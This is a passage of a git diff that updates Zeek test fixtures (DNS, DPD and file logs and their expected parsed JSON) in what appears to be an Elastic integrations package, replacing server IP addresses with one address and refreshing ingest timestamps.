"{\"ts\":1617105593.106256,\"uid\":\"ChP0cl4j5mbXSZ9TGf\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":36364,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":8791,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[12.0,17.0,7.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "ChP0cl4j5mbXSZ9TGf", @@ -791,7 +791,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:25.340467500Z", + "ingested": "2021-12-09T13:50:59.483518400Z", "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json index 4f55320b2a5..7471188fd29 100644 --- a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json +++ b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json @@ -29,7 +29,7 @@ "ip": "192.168.10.31" }, "event": { - "ingested": "2021-08-11T19:18:26.417335800Z", + "ingested": "2021-12-09T13:51:00.428784900Z", "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -94,7 +94,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:26.417347Z", + "ingested": "2021-12-09T13:51:00.428792700Z", "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log index 431426e874d..badcd999569 100644 --- a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log +++ b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log @@ -1,9 +1,9 @@ -{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["35.199.178.4"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"} -{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"} -{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"} -{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} -{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} -{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} +{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"} +{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"} +{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"} +{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} +{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} +{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} {"ts":1617069792.519193,"fuid":"FSMkdM3YUSoEVpLZN4","tx_hosts":["169.254.169.254"],"rx_hosts":["10.156.0.2"],"conn_uids":["CgbPEj2jf5Ca7Lw0x2"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5"],"mime_type":"text/html","duration":0.00005316734313964844,"local_orig":false,"is_orig":false,"seen_bytes":1609,"total_bytes":1609,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"1ab1d3a926a99ccfc25acccc5b4289b4","sha1":"1895628784b47ad8da112c699a1b21f5b49c2b80"} -{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/dhcp.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/dhcp.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json index 8cda6e11c7e..f431a34ebaa 100644 --- a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json +++ b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "server": { - "ip": "35.199.178.4" + "ip": "89.160.20.156" }, "@timestamp": "2019-01-17T01:33:16.636Z", "file": { @@ -21,7 +21,7 @@ "a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436" ], "ip": [ - "35.199.178.4", + "89.160.20.156", "10.178.98.102" ] }, @@ -32,7 +32,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "35.199.178.4", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -57,8 +57,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826676700Z", - "original": "{\"ts\":1547688796.636812,\"fuid\":\"FMkioa222mEuM2RuQ9\",\"tx_hosts\":[\"35.199.178.4\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C8I0zn3r9EPbfLgta6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":947,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"79e4a9840d7d3a96d7c04fe2434c892e\",\"sha1\":\"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436\"}", + "ingested": "2021-12-09T13:51:00.753332400Z", + "original": "{\"ts\":1547688796.636812,\"fuid\":\"FMkioa222mEuM2RuQ9\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C8I0zn3r9EPbfLgta6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":947,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"79e4a9840d7d3a96d7c04fe2434c892e\",\"sha1\":\"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C8I0zn3r9EPbfLgta6", @@ -75,7 +75,7 @@ }, { "server": { - "ip": "17.134.127.250" + "ip": "89.160.20.156" }, "@timestamp": "2019-01-17T01:33:21.566Z", "file": { @@ -94,7 +94,7 @@ "b88d13fe319d342e7a808ce3a0a1158111fc3c2a" ], "ip": [ - "17.134.127.250", + "89.160.20.156", "10.178.98.102" ] }, @@ -105,7 +105,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "17.134.127.250", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -130,8 +130,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826692200Z", - "original": "{\"ts\":1547688801.566262,\"fuid\":\"FShtIS1gydeSFf8M63\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":2089,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"b9742f12eb97eff531d94f7800c6706c\",\"sha1\":\"b88d13fe319d342e7a808ce3a0a1158111fc3c2a\"}", + "ingested": "2021-12-09T13:51:00.753340900Z", + "original": "{\"ts\":1547688801.566262,\"fuid\":\"FShtIS1gydeSFf8M63\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":2089,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"b9742f12eb97eff531d94f7800c6706c\",\"sha1\":\"b88d13fe319d342e7a808ce3a0a1158111fc3c2a\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6sjVo23iNApLnlAt6", @@ -148,7 +148,7 @@ }, { "server": { - "ip": "17.134.127.250" + "ip": "89.160.20.156" }, "@timestamp": "2019-01-17T01:33:21.566Z", "file": { @@ -167,7 +167,7 @@ "8e8321ca08b08e3726fe1d82996884eeb5f0d655" ], "ip": [ - "17.134.127.250", + "89.160.20.156", "10.178.98.102" ] }, @@ -178,7 +178,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "17.134.127.250", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -203,8 +203,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826699900Z", - "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", + "ingested": "2021-12-09T13:51:00.753346700Z", + "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6sjVo23iNApLnlAt6", @@ -221,7 +221,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:02:43.671Z", "file": { @@ -242,7 +242,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, @@ -254,7 +254,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -280,8 +280,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826774400Z", - "original": "{\"ts\":1617069763.671838,\"fuid\":\"Fe722V1qt2DSlqCiOa\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"ClG5ErV7bkgKgOaV\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753352300Z", + "original": "{\"ts\":1617069763.671838,\"fuid\":\"Fe722V1qt2DSlqCiOa\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"ClG5ErV7bkgKgOaV\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "ClG5ErV7bkgKgOaV", @@ -298,7 +298,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:02:53.678Z", "file": { @@ -319,7 +319,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, @@ -331,7 +331,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -357,8 +357,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826785100Z", - "original": "{\"ts\":1617069773.678327,\"fuid\":\"FYszs61e8hIUWMWgL5\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CaB3fq3yLrKCbYLqr4\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753359800Z", + "original": "{\"ts\":1617069773.678327,\"fuid\":\"FYszs61e8hIUWMWgL5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CaB3fq3yLrKCbYLqr4\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CaB3fq3yLrKCbYLqr4", @@ -375,7 +375,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:03:03.678Z", "file": { @@ -396,7 +396,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, @@ -408,7 +408,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -434,8 +434,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826810200Z", - "original": "{\"ts\":1617069783.678588,\"fuid\":\"FdGWZq2wRIvCfjvdI5\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vhl91PPOI7LbrPZ8\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753365500Z", + "original": "{\"ts\":1617069783.678588,\"fuid\":\"FdGWZq2wRIvCfjvdI5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vhl91PPOI7LbrPZ8\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C0vhl91PPOI7LbrPZ8", @@ -507,7 +507,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826815100Z", + "ingested": "2021-12-09T13:51:00.753370900Z", "original": 